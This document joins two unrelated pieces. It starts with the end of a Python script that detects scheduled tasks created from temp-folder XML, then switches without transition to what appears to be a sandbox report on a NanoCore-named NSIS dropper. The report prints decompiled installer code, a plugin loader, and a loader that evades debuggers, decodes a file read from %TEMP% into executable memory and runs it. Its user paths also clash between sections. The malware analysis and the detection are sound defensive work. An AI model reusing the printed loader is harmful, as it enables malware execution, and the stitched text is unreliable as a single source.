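    opts = {}
    i = 1
    while i < len(toks):
        key = toks[i].lower()
        if key in SWITCHES_WITH_VALUE and i + 1 < len(toks):
            opts[key] = toks[i + 1]
            i += 2
        else:
            opts[key] = True          # bare switch such as /create or /f
            i += 1
    if "/create" not in opts:
        return None
    xml = opts.get("/xml")
    return {
        "task_name": opts.get("/tn"),
        "xml": xml,
        "action": opts.get("/tr"),
        "force": "/f" in opts,        # /f silently overwrites an existing task
        "xml_from_temp": isinstance(xml, str) and bool(TEMP_DIR_RE.search(xml)),
    }


def scan(events):
    """Findings for every /create whose task definition is read from a temp path."""
    findings = []
    for ev in events:
        info = analyze_schtasks(ev["cmdline"])
        if info and info["xml_from_temp"]:
            info["parent"] = ev["parent"]
            info["parent_user_writable"] = bool(USER_WRITABLE_RE.search(ev["parent"]))
            findings.append(info)
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"task {hit['task_name']!r} from {hit['xml']} "
              f"(parent {hit['parent']}, user-writable={hit['parent_user_writable']})")
```

Only the two report command lines are reported; the constructed backup task passes because its definition comes from /tr rather than a temp XML, and the /query call is not a creation at all. When a finding fires, the XML file is usually deleted immediately, so collect the task definition from the Task Scheduler store (C:\Windows\System32\Tasks\<name>) or the Microsoft-Windows-TaskScheduler operational log rather than from %TEMP%.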

          Disassembly

          Code Analysis

          Reset < >

            Executed Functions

            C-Code - Quality: 86%
            			_entry_() {
            				struct _SHFILEINFOA _v356;
            				long _v372;
            				char _v380;
            				int _v396;
            				CHAR* _v400;
            				signed int _v404;
            				signed int _v408;
            				char _v416;
            				intOrPtr _v424;
            				intOrPtr _t31;
            				void* _t36;
            				CHAR* _t41;
            				signed int _t43;
            				CHAR* _t46;
            				signed int _t48;
            				int _t52;
            				signed int _t56;
            				void* _t78;
            				CHAR* _t89;
            				signed int _t90;
            				void* _t91;
            				CHAR* _t96;
            				signed int _t97;
            				signed int _t99;
            				signed char* _t103;
            				CHAR* _t105;
            				signed int _t106;
            				void* _t108;
            
            				_t99 = 0;
            				_v372 = 0;
            				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
            				_v380 = 0x20;
            				__imp__#17();
            				__imp__OleInitialize(0); // executed
            				 *0x7a3030 = _t31;
            				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
            				E004059BF(0x7a2780, "NSIS Error");
            				_t89 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
            				GetTempPathA(0x400, _t89);
            				_t36 = E00403116(_t108);
            				_t109 = _t36;
            				if(_t36 != 0) {
            					L2:
            					_t96 = "\"C:\\Users\\jones\\Desktop\\nanocore.exe\" ";
            					DeleteFileA(_t96); // executed
            					E004059BF(_t96, GetCommandLineA());
            					 *0x7a2f80 = GetModuleHandleA(0);
            					_t41 = _t96;
					if("\"C:\\Users\\jones\\Desktop\\nanocore.exe\" " == 0x22) { // decompiler artifact: tests the first byte of the command line, 0x22 = '"'
            						_v404 = 0x22;
            						_t41 =  &M007A9001;
            					}
            					_t43 = CharNextA(E004054F7(_t41, _v404));
            					_v408 = _t43;
            					while(1) {
            						_t91 =  *_t43;
            						_t112 = _t91;
            						if(_t91 == 0) {
            							break;
            						}
            						__eflags = _t91 - 0x20;
            						if(_t91 != 0x20) {
            							L7:
            							__eflags =  *_t43 - 0x22;
            							_v404 = 0x20;
            							if( *_t43 == 0x22) {
            								_t43 = _t43 + 1;
            								__eflags = _t43;
            								_v404 = 0x22;
            							}
            							__eflags =  *_t43 - 0x2f;
            							if( *_t43 != 0x2f) {
            								L17:
            								_t43 = E004054F7(_t43, _v404);
            								__eflags =  *_t43 - 0x22;
            								if(__eflags == 0) {
            									_t43 = _t43 + 1;
            									__eflags = _t43;
            								}
            								continue;
            							} else {
            								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53; // 0x53 = 'S': NSIS "/S" (silent install) switch
            								if( *_t43 == 0x53) {
            									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
            									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
            										_t99 = _t99 | 0x00000002;
            										__eflags = _t99;
            									}
            								}
								__eflags =  *_t43 - 0x4352434e; // little-endian dword "NCRC": NSIS "/NCRC" (skip CRC check) switch
            								if( *_t43 == 0x4352434e) {
            									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
            									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
            										_t99 = _t99 | 0x00000004;
            										__eflags = _t99;
            									}
            								}
								__eflags =  *(_t43 - 2) - 0x3d442f20; // little-endian dword " /D=": NSIS install-directory override
            								if( *(_t43 - 2) == 0x3d442f20) {
            									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
            									__eflags = _t43 + 2;
            									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t43 + 2);
            									L22:
            									_t46 = E00402C37(_t112, _t99); // executed
            									_t105 = _t46;
            									if(_t105 != 0) {
            										L32:
            										E00403501();
            										__imp__OleUninitialize();
            										if(_t105 == 0) {
            											__eflags =  *0x7a3014;
            											if( *0x7a3014 != 0) {
            												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
            												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
            												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
            												__eflags = _t106;
            												if(_t106 != 0) {
            													__eflags = _t97;
            													if(_t97 != 0) {
            														__eflags = _t90;
            														if(_t90 != 0) {
            															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
            															__eflags = _t56;
            															if(_t56 != 0) {
            																 *_t97(0, "SeShutdownPrivilege",  &_v400);
            																_v416 = 1;
            																_v404 = 2;
            																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
            															}
            														}
            													}
            												}
            												_t52 = ExitWindowsEx(2, 0);
            												__eflags = _t52;
            												if(_t52 == 0) {
            													E00401410(9);
            												}
            											}
            											_t48 =  *0x7a302c;
            											__eflags = _t48 - 0xffffffff;
            											if(_t48 != 0xffffffff) {
            												_v396 = _t48;
            											}
            											ExitProcess(_v396);
            										}
            										E004052BF(_t105, 0x200010);
            										ExitProcess(2);
            									}
            									if( *0x7a2f94 == _t46) {
            										L31:
            										 *0x7a302c =  *0x7a302c | 0xffffffff;
            										_v396 = E00403526();
            										goto L32;
            									}
            									_t103 = E004054F7(_t96, _t46);
            									while(_t103 >= _t96) {
            										__eflags =  *_t103 - 0x3d3f5f20;
            										if(__eflags == 0) {
            											break;
            										}
            										_t103 = _t103 - 1;
            										__eflags = _t103;
            									}
            									_t116 = _t103 - _t96;
            									_t105 = "Error launching installer";
            									if(_t103 < _t96) {
            										lstrcatA(_t89, "~nsu.tmp\\");
            										CreateDirectoryA(_t89, 0);
            										_v404 = _v404 & 0x00000000;
            										do {
            											 *0x79d940 = 0x22;
            											lstrcatA(0x79d940, _t89);
            											lstrcatA(0x79d940, "Au_.exe");
            											DeleteFileA(0x79d941);
            											if(_t105 == 0) {
            												goto L43;
            											}
            											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
            												goto L32;
            											}
            											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
            												E00405707(0x79d941, 0);
            												if("C:\\Users\\jones\\AppData\\Local\\Temp" == 0) {
            													E00405513(0x79e140);
            												} else {
            													E004059BF(0x79e140, "C:\\Users\\jones\\AppData\\Local\\Temp");
            												}
            												lstrcatA(0x79d940, "\" ");
            												lstrcatA(0x79d940, _v400);
            												lstrcatA(0x79d940, " _?=");
            												lstrcatA(0x79d940, 0x79e140);
            												E004054CC(0x79d940);
            												_t78 = E00405247(0x79d940, _t89);
            												if(_t78 != 0) {
            													CloseHandle(_t78);
            													_t105 = 0;
            												}
            											}
            											L43:
            											"Au_.exe" =  &("Au_.exe"[1]);
            											_v404 = _v404 + 1;
            										} while (_v404 < 0x1a);
            										goto L32;
            									}
            									 *_t103 =  *_t103 & 0x00000000;
            									_t104 =  &(_t103[4]);
            									if(E004055AC(_t116,  &(_t103[4])) == 0) {
            										goto L32;
            									}
            									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
            									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
            									_t105 = 0;
            									goto L31;
            								}
            								goto L17;
            							}
            						} else {
            							goto L6;
            						}
            						do {
            							L6:
            							_t43 = _t43 + 1;
            							__eflags =  *_t43 - 0x20;
            						} while ( *_t43 == 0x20);
            						goto L7;
            					}
            					goto L22;
            				}
            				GetWindowsDirectoryA(_t89, 0x3fb);
            				lstrcatA(_t89, "\\Temp");
            				if(E00403116(_t109) == 0) {
            					goto L32;
            				}
            				goto L2;
            			}

            APIs
            • #17.COMCTL32 ref: 00403164
            • OleInitialize.OLE32(00000000), ref: 0040316B
            • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
              • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
            • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\nanocore.exe" ), ref: 004031E0
            • GetCommandLineA.KERNEL32 ref: 004031E6
            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 004031F5
            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\nanocore.exe" ,00000020), ref: 00403220
            • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
            • ExitProcess.KERNEL32 ref: 00403336
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\nanocore.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\nanocore.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
            • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
            • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
            • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
            • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
            • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
            • CopyFileA.KERNEL32 ref: 004033C1
            • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
            • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
            • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
            • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
            • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
            • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
            • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
            • ExitProcess.KERNEL32 ref: 004034FB
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
            • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\nanocore.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
            • API String ID: 3079827372-1314311271
            • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
            • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
            • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
            • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
            				signed int _v8;
            				signed int _v12;
            				struct _WIN32_FIND_DATAA _v332;
            				signed int _t37;
            				char* _t49;
            				signed char _t51;
            				signed int _t54;
            				signed int _t57;
            				signed int _t63;
            				signed int _t65;
            				void* _t67;
            				signed int _t70;
            				CHAR* _t72;
            				CHAR* _t74;
            				char* _t77;
            
            				_t74 = _a4;
            				_t37 = E004055AC(__eflags, _t74);
            				_v12 = _t37;
            				if((_a8 & 0x00000008) != 0) {
            					_t65 = DeleteFileA(_t74); // executed
            					asm("sbb eax, eax");
            					_t67 =  ~_t65 + 1;
            					 *0x7a3008 =  *0x7a3008 + _t67;
            					return _t67;
            				}
            				_t70 = _a8 & 0x00000001;
            				__eflags = _t70;
            				_v8 = _t70;
            				if(_t70 == 0) {
            					L5:
            					E004059BF(0x7a0588, _t74);
            					__eflags = _t70;
            					if(_t70 == 0) {
            						E00405513(_t74);
            					} else {
            						lstrcatA(0x7a0588, "\\*.*");
            					}
            					lstrcatA(_t74, 0x409010);
            					_t72 =  &(_t74[lstrlenA(_t74)]);
            					_t37 = FindFirstFileA(0x7a0588,  &_v332);
            					__eflags = _t37 - 0xffffffff;
            					_a4 = _t37;
            					if(_t37 == 0xffffffff) {
            						L26:
            						__eflags = _v8;
            						if(_v8 != 0) {
            							_t31 = _t72 - 1;
            							 *_t31 =  *(_t72 - 1) & 0x00000000;
            							__eflags =  *_t31;
            						}
            						goto L28;
            					} else {
            						goto L9;
            					}
            					do {
            						L9:
            						_t77 =  &(_v332.cFileName);
            						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
            						__eflags =  *_t49;
            						if( *_t49 != 0) {
            							__eflags = _v332.cAlternateFileName;
            							if(_v332.cAlternateFileName != 0) {
            								_t77 =  &(_v332.cAlternateFileName);
            							}
            						}
            						__eflags =  *_t77 - 0x2e;
            						if( *_t77 != 0x2e) {
            							L16:
            							E004059BF(_t72, _t77);
            							_t51 = _v332.dwFileAttributes;
            							__eflags = _t51 & 0x00000010;
            							if((_t51 & 0x00000010) == 0) {
            								SetFileAttributesA(_t74, _t51 & 0x000000fe);
            								_t54 = DeleteFileA(_t74);
            								__eflags = _t54;
            								if(_t54 != 0) {
            									E00404D62(0xfffffff2, _t74);
            								} else {
            									__eflags = _a8 & 0x00000004;
            									if((_a8 & 0x00000004) == 0) {
            										 *0x7a3008 =  *0x7a3008 + 1;
            									} else {
            										E00404D62(0xfffffff1, _t74);
            										E00405707(_t74, 0);
            									}
            								}
            							} else {
            								__eflags = (_a8 & 0x00000003) - 3;
            								if(__eflags == 0) {
            									E00405301(_t72, __eflags, _t74, _a8);
            								}
            							}
            							goto L24;
            						}
            						_t63 =  *((intOrPtr*)(_t77 + 1));
            						__eflags = _t63;
            						if(_t63 == 0) {
            							goto L24;
            						}
            						__eflags = _t63 - 0x2e;
            						if(_t63 != 0x2e) {
            							goto L16;
            						}
            						__eflags =  *((char*)(_t77 + 2));
            						if( *((char*)(_t77 + 2)) == 0) {
            							goto L24;
            						}
            						goto L16;
            						L24:
            						_t57 = FindNextFileA(_a4,  &_v332);
            						__eflags = _t57;
            					} while (_t57 != 0);
            					_t37 = FindClose(_a4);
            					goto L26;
            				} else {
            					__eflags = _t37;
            					if(_t37 == 0) {
            						L28:
            						__eflags = _v8;
            						if(_v8 == 0) {
            							L36:
            							return _t37;
            						}
            						__eflags = _v12;
            						if(_v12 != 0) {
            							_t37 = E00405C94(_t74);
            							__eflags = _t37;
            							if(_t37 == 0) {
            								goto L36;
            							}
            							E004054CC(_t74);
            							SetFileAttributesA(_t74, 0x80);
            							_t37 = RemoveDirectoryA(_t74);
            							__eflags = _t37;
            							if(_t37 != 0) {
            								return E00404D62(0xffffffe5, _t74);
            							}
            							__eflags = _a8 & 0x00000004;
            							if((_a8 & 0x00000004) == 0) {
            								goto L30;
            							}
            							E00404D62(0xfffffff1, _t74);
            							return E00405707(_t74, 0);
            						}
            						L30:
            						 *0x7a3008 =  *0x7a3008 + 1;
            						return _t37;
            					}
            					__eflags = _a8 & 0x00000002;
            					if((_a8 & 0x00000002) == 0) {
            						goto L28;
            					}
            					goto L5;
            				}
            			}

            APIs
            • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 0040531F
            • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 00405369
            • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 0040537C
            • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 00405382
            • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 00405393
            • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
            • FindClose.KERNEL32(?), ref: 0040545B
            Strings
            • \*.*, xrefs: 00405363
            • "C:\Users\user\Desktop\nanocore.exe" , xrefs: 0040530B
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
            • String ID: "C:\Users\user\Desktop\nanocore.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
            • API String ID: 2035342205-1352018503
            • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
            • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
            • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
            • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 82%
            			E6FC71000() {
            				long _v8;
            				short _v528;
            				long _t12;
            				void* _t16;
            				signed char _t23;
            				void* _t35;
            				long _t38;
            
            				_v8 = 0;
            				if(IsDebuggerPresent() != 0) {
            					DebugBreak();
            				}
            				_t12 = GetTempPathW(0x103,  &_v528);
            				if(_t12 != 0) {
            					lstrcatW( &_v528, L"\\ks446tcfy17w7jqy3r");
            					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
            					_t35 = _t16;
            					if(_t35 == 0xffffffff) {
            						L12:
            						return _t16;
            					}
            					_t16 = GetFileSize(_t35, 0);
            					_t38 = _t16;
            					if(_t38 == 0xffffffff) {
            						L11:
            						goto L12;
            					}
            					_t16 = VirtualAlloc(0, _t38, 0x3000, 0x40); // executed
            					 *0x6fc73000 = _t16;
            					if(_t16 == 0) {
            						goto L11;
            					}
            					_t16 = ReadFile(_t35, _t16, _t38,  &_v8, 0); // executed
            					if(_t16 == 0) {
            						goto L11;
            					}
            					_t23 = 0;
            					if(_v8 <= 0) {
            						L10:
            						_t16 =  *0x6fc73000(); // executed
            						goto L11;
            					}
            					do {
            						asm("rol cl, 0x2");
            						 *((char*)( *0x6fc73000 + _t23)) = (0x00000082 - (( !( *((intOrPtr*)( *0x6fc73000 + _t23)) + 0x00000003 ^ 0x0000006a) ^ 0x000000e1) - _t23 ^ _t23) ^ 0x00000068) - 1 + _t23;
            						_t23 = _t23 + 1;
            					} while (_t23 < _v8);
            					goto L10;
            				}
            				return _t12;
            			}

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 6FC71010
            • DebugBreak.KERNEL32 ref: 6FC7101A
            • GetTempPathW.KERNEL32(00000103,?), ref: 6FC7102C
            • lstrcatW.KERNEL32(?,\ks446tcfy17w7jqy3r), ref: 6FC71047
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FC71066
            • GetFileSize.KERNEL32(00000000,00000000), ref: 6FC7107B
            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 6FC71092
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 6FC710AA
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.651154629.000000006FC71000.00000020.00020000.sdmp, Offset: 6FC70000, based on PE: true
            • Associated: 00000001.00000002.651150286.000000006FC70000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.651162298.000000006FC72000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.651169227.000000006FC74000.00000002.00020000.sdmp
            Similarity
            • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
            • String ID: \ks446tcfy17w7jqy3r
            • API String ID: 4020703165-2035310939
            • Opcode ID: e139af75250ee234ea3a10d8683e4c3dcc06fbf0cc80740f4b8d221e47e8f41a
            • Instruction ID: c583b7d1458172d822b004803ed5bb2b2681b9590f714df90304b352f2cdb833
            • Opcode Fuzzy Hash: e139af75250ee234ea3a10d8683e4c3dcc06fbf0cc80740f4b8d221e47e8f41a
            • Instruction Fuzzy Hash: 3221E030600622ABEB309B758C6EBEA7BBCFB07760F104255E724A20C1EE747215CA71
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E00401FDC(int __ebx) {
            				struct HINSTANCE__* _t20;
            				struct HINSTANCE__* _t27;
            				int _t28;
            				struct HINSTANCE__* _t33;
            				CHAR* _t35;
            				intOrPtr* _t36;
            				void* _t37;
            
            				_t28 = __ebx;
            				 *(_t37 - 4) = 1;
            				SetErrorMode(0x8001); // executed
            				if( *0x7a3030 < __ebx) {
            					_push(0xffffffe7);
            					goto L14;
            				} else {
            					_t35 = E00402A9A(0xfffffff0);
            					 *(_t37 + 8) = E00402A9A(1);
            					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
            						L3:
            						_t20 = LoadLibraryA(_t35); // executed
            						_t33 = _t20;
            						if(_t33 == _t28) {
            							_push(0xfffffff6);
            							L14:
            							E00401428();
            						} else {
            							goto L4;
            						}
            					} else {
            						_t27 = GetModuleHandleA(_t35); // executed; reuse the module if it is already loaded (plugins called with /NOUNLOAD stay resident)
            						_t33 = _t27;
            						if(_t33 != __ebx) {
            							L4:
            							_t36 = GetProcAddress(_t33,  *(_t37 + 8)); // resolve the export named by the script (the plugin function, or DllRegisterServer/DllUnregisterServer for RegDLL/UnRegDLL)
            							if(_t36 == _t28) {
            								E00404D62(0xfffffff7,  *(_t37 + 8)); // export not found: update the status text with the symbol name (lstrcat/SetWindowText/SendMessage in the subcall list below)
            							} else {
            								 *(_t37 - 4) = _t28;
            								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
            									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed; NSIS plugin ABI: func(hwndParent, NSIS_MAX_STRLEN = 0x400, variables, &stacktop, &extra_parameters), so the plugin can read and write every installer variable and the string stack
            								} else {
            									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
            									if( *_t36() != 0) { // RegDLL/UnRegDLL path: the export is called with no arguments and a non-zero return counts as an error
            										 *(_t37 - 4) = 1;
            									}
            								}
            							}
            							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
            								FreeLibrary(_t33); // unload unless the script asked for /NOUNLOAD
            							}
            						} else {
            							goto L3;
            						}
            					}
            				}
            				SetErrorMode(_t28);
            				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4); // propagate the error flag to the script: 1 if loading, resolving or calling failed, 0 otherwise
            				return 0;
            			}
            Instruction addresses for the C code above, one per statement line in order (0x00000000 marks a goto/label line synthesised by the decompiler with no instruction of its own):
            0x00401fdc 0x00401fe4 0x00401fe7 0x00401ff3 0x00402093 0x00000000 0x00401ff9 0x00402001
            0x0040200b 0x0040200e 0x0040201d 0x0040201e 0x00402024 0x00402028 0x0040208f 0x00402095
            0x00402095 0x00000000 0x00000000 0x00000000 0x00402010 0x00402011 0x00402017 0x0040201b
            0x0040202a 0x00402034 0x00402038 0x0040207c 0x0040203a 0x0040203d 0x00402040 0x00402070
            0x00402042 0x00402045 0x0040204e 0x00402050 0x00402050 0x0040204e 0x00402040 0x00402084
            0x00402087 0x00402087 0x00000000 0x00000000 0x00000000 0x0040201b 0x0040200e 0x0040209b
            0x00402932 0x0040293e

            APIs
            • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
            • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
            • SetErrorMode.KERNEL32 ref: 0040209B
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
